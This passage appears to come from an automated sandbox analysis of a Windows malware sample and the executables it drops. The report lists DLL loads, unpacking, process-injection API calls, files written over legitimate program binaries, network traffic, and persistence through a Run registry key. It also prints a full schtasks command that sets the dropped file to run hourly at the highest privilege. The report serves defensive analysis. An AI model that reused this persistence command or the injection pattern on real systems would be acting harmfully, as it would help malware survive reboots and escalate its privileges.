            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: ntvdm64.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: ntvdm64.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: version.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: wldp.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: profapi.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: wininet.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: devobj.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: version.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: wldp.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: profapi.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: wininet.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: devobj.dllJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: devobj.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: ntvdm64.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: ntvdm64.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: ntvdm64.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: ntvdm64.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: ntvdm64.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeAutomated click: OK
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeAutomated click: OK
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeAutomated click: OK
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeAutomated click: OK
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeAutomated click: OK
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeAutomated click: OK
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeAutomated click: OK
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeAutomated click: OK
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: Lisect_AVT_24003_G1A_89.exeStatic file information: File size 3146240 > 1048576
            Source: Lisect_AVT_24003_G1A_89.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x22c400
            Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr

            Data Obfuscation

            barindex
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeUnpacked PE file: 0.2.Lisect_AVT_24003_G1A_89.exe.fb0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.rsrc:R;Unknown_Section6:EW;.data:EW;pL~u:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:R;.rsrc:R;Unknown_Section6:EW;.data:EW;pL~u:EW;
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeUnpacked PE file: 1.2.jHYZko.exe.e60000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeUnpacked PE file: 7.2.MPGPH131.exe.570000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.rsrc:R;Unknown_Section6:EW;.data:EW;pL~u:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:R;.rsrc:R;Unknown_Section6:EW;.data:EW;pL~u:EW;
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeUnpacked PE file: 8.2.MPGPH131.exe.570000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.rsrc:R;Unknown_Section6:EW;.data:EW;pL~u:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:R;.rsrc:R;Unknown_Section6:EW;.data:EW;pL~u:EW;
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeUnpacked PE file: 15.2.RageMP131.exe.8c0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.rsrc:R;Unknown_Section6:EW;.data:EW;pL~u:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:R;.rsrc:R;Unknown_Section6:EW;.data:EW;pL~u:EW;
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeUnpacked PE file: 16.2.jHYZko.exe.1e0000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,Process32Next,CloseHandle,0_2_00FBAB50
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,Process32Next,CloseHandle,7_2_0057AB50
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,Process32Next,CloseHandle,8_2_0057AB50
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_00FCA100 VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAllocEx,LoadLibraryA,GetProcAddress,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject,0_2_00FCA100
            Source: initial sampleStatic PE information: section where entry point is pointing to: pL~u
            Source: Lisect_AVT_24003_G1A_89.exeStatic PE information: section name:
            Source: Lisect_AVT_24003_G1A_89.exeStatic PE information: section name:
            Source: Lisect_AVT_24003_G1A_89.exeStatic PE information: section name:
            Source: Lisect_AVT_24003_G1A_89.exeStatic PE information: section name:
            Source: Lisect_AVT_24003_G1A_89.exeStatic PE information: section name:
            Source: Lisect_AVT_24003_G1A_89.exeStatic PE information: section name:
            Source: Lisect_AVT_24003_G1A_89.exeStatic PE information: section name: pL~u
            Source: jHYZko.exe.0.drStatic PE information: section name: .aspack
            Source: jHYZko.exe.0.drStatic PE information: section name: .adata
            Source: RageMP131.exe.0.drStatic PE information: section name:
            Source: RageMP131.exe.0.drStatic PE information: section name:
            Source: RageMP131.exe.0.drStatic PE information: section name:
            Source: RageMP131.exe.0.drStatic PE information: section name:
            Source: RageMP131.exe.0.drStatic PE information: section name:
            Source: RageMP131.exe.0.drStatic PE information: section name:
            Source: RageMP131.exe.0.drStatic PE information: section name: pL~u
            Source: MPGPH131.exe.0.drStatic PE information: section name:
            Source: MPGPH131.exe.0.drStatic PE information: section name:
            Source: MPGPH131.exe.0.drStatic PE information: section name:
            Source: MPGPH131.exe.0.drStatic PE information: section name:
            Source: MPGPH131.exe.0.drStatic PE information: section name:
            Source: MPGPH131.exe.0.drStatic PE information: section name:
            Source: MPGPH131.exe.0.drStatic PE information: section name: pL~u
            Source: MyProg.exe.1.drStatic PE information: section name: PELIB
            Source: MyProg.exe.1.drStatic PE information: section name: Y|uR
            Source: SciTE.exe.1.drStatic PE information: section name: u
            Source: Uninstall.exe.1.drStatic PE information: section name: EpNuZ
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_0108D509 push ecx; ret 0_2_0108D51C
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_7ECA0EC0 push 7ECA0002h; ret 0_2_7ECA0ECF
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_7ECA1AC0 push 7ECA0002h; ret 0_2_7ECA1ACF
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_7ECA26C0 push 7ECA0002h; ret 0_2_7ECA26CF
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_7ECA16D0 push 7ECA0002h; ret 0_2_7ECA16DF
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_7ECA22D0 push 7ECA0002h; ret 0_2_7ECA22DF
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_7ECA12E0 push 7ECA0002h; ret 0_2_7ECA12EF
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_7ECA1EE0 push 7ECA0002h; ret 0_2_7ECA1EEF
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_7ECA2AE0 push 7ECA0002h; ret 0_2_7ECA2AEF
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_7ECA0EF0 push 7ECA0002h; ret 0_2_7ECA0EFF
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_7ECA1AF0 push 7ECA0002h; ret 0_2_7ECA1AFF
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_7ECA26F0 push 7ECA0002h; ret 0_2_7ECA26FF
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_7ECA1280 push 7ECA0002h; ret 0_2_7ECA128F
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_7ECA1E80 push 7ECA0002h; ret 0_2_7ECA1E8F
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_7ECA2A80 push 7ECA0002h; ret 0_2_7ECA2A8F
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_7ECA0E90 push 7ECA0002h; ret 0_2_7ECA0E9F
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_7ECA1A90 push 7ECA0002h; ret 0_2_7ECA1A9F
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_7ECA2690 push 7ECA0002h; ret 0_2_7ECA269F
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_7ECA16A0 push 7ECA0002h; ret 0_2_7ECA16AF
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_7ECA22A0 push 7ECA0002h; ret 0_2_7ECA22AF
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_7ECA12B0 push 7ECA0002h; ret 0_2_7ECA12BF
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_7ECA1EB0 push 7ECA0002h; ret 0_2_7ECA1EBF
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_7ECA2AB0 push 7ECA0002h; ret 0_2_7ECA2ABF
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_7ECA1640 push 7ECA0002h; ret 0_2_7ECA164F
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_7ECA2240 push 7ECA0002h; ret 0_2_7ECA224F
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_7ECA1250 push 7ECA0002h; ret 0_2_7ECA125F
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_7ECA1E50 push 7ECA0002h; ret 0_2_7ECA1E5F
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_7ECA2A50 push 7ECA0002h; ret 0_2_7ECA2A5F
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_7ECA0E60 push 7ECA0002h; ret 0_2_7ECA0E6F
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_7ECA1A60 push 7ECA0002h; ret 0_2_7ECA1A6F
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_7ECA2660 push 7ECA0002h; ret 0_2_7ECA266F
            Source: Lisect_AVT_24003_G1A_89.exeStatic PE information: section name: entropy: 7.999515690267131
            Source: Lisect_AVT_24003_G1A_89.exeStatic PE information: section name: entropy: 7.995045563532632
            Source: Lisect_AVT_24003_G1A_89.exeStatic PE information: section name: entropy: 7.346914669025697
            Source: Lisect_AVT_24003_G1A_89.exeStatic PE information: section name: entropy: 7.987242582491748
            Source: Lisect_AVT_24003_G1A_89.exeStatic PE information: section name: pL~u entropy: 6.934637589599884
            Source: jHYZko.exe.0.drStatic PE information: section name: .text entropy: 7.81169422100848
            Source: RageMP131.exe.0.drStatic PE information: section name: entropy: 7.999515690267131
            Source: RageMP131.exe.0.drStatic PE information: section name: entropy: 7.995045563532632
            Source: RageMP131.exe.0.drStatic PE information: section name: entropy: 7.346914669025697
            Source: RageMP131.exe.0.drStatic PE information: section name: entropy: 7.987242582491748
            Source: RageMP131.exe.0.drStatic PE information: section name: pL~u entropy: 6.934637589599884
            Source: MPGPH131.exe.0.drStatic PE information: section name: entropy: 7.999515690267131
            Source: MPGPH131.exe.0.drStatic PE information: section name: entropy: 7.995045563532632
            Source: MPGPH131.exe.0.drStatic PE information: section name: entropy: 7.346914669025697
            Source: MPGPH131.exe.0.drStatic PE information: section name: entropy: 7.987242582491748
            Source: MPGPH131.exe.0.drStatic PE information: section name: pL~u entropy: 6.934637589599884
            Source: MyProg.exe.1.drStatic PE information: section name: Y|uR entropy: 6.93452978692724
            Source: SciTE.exe.1.drStatic PE information: section name: u entropy: 6.934615465188442
            Source: Uninstall.exe.1.drStatic PE information: section name: EpNuZ entropy: 6.9345550066903225

            Persistence and Installation Behavior

            barindex
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeFile created: C:\Users\user\AppData\Local\Temp\jHYZko.exeJump to dropped file
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeFile created: C:\ProgramData\MPGPH131\MPGPH131.exeJump to dropped file
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeFile created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeFile created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeFile created: C:\ProgramData\MPGPH131\MPGPH131.exeJump to dropped file

            Boot Survival

            barindex
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131Jump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131Jump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 799
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
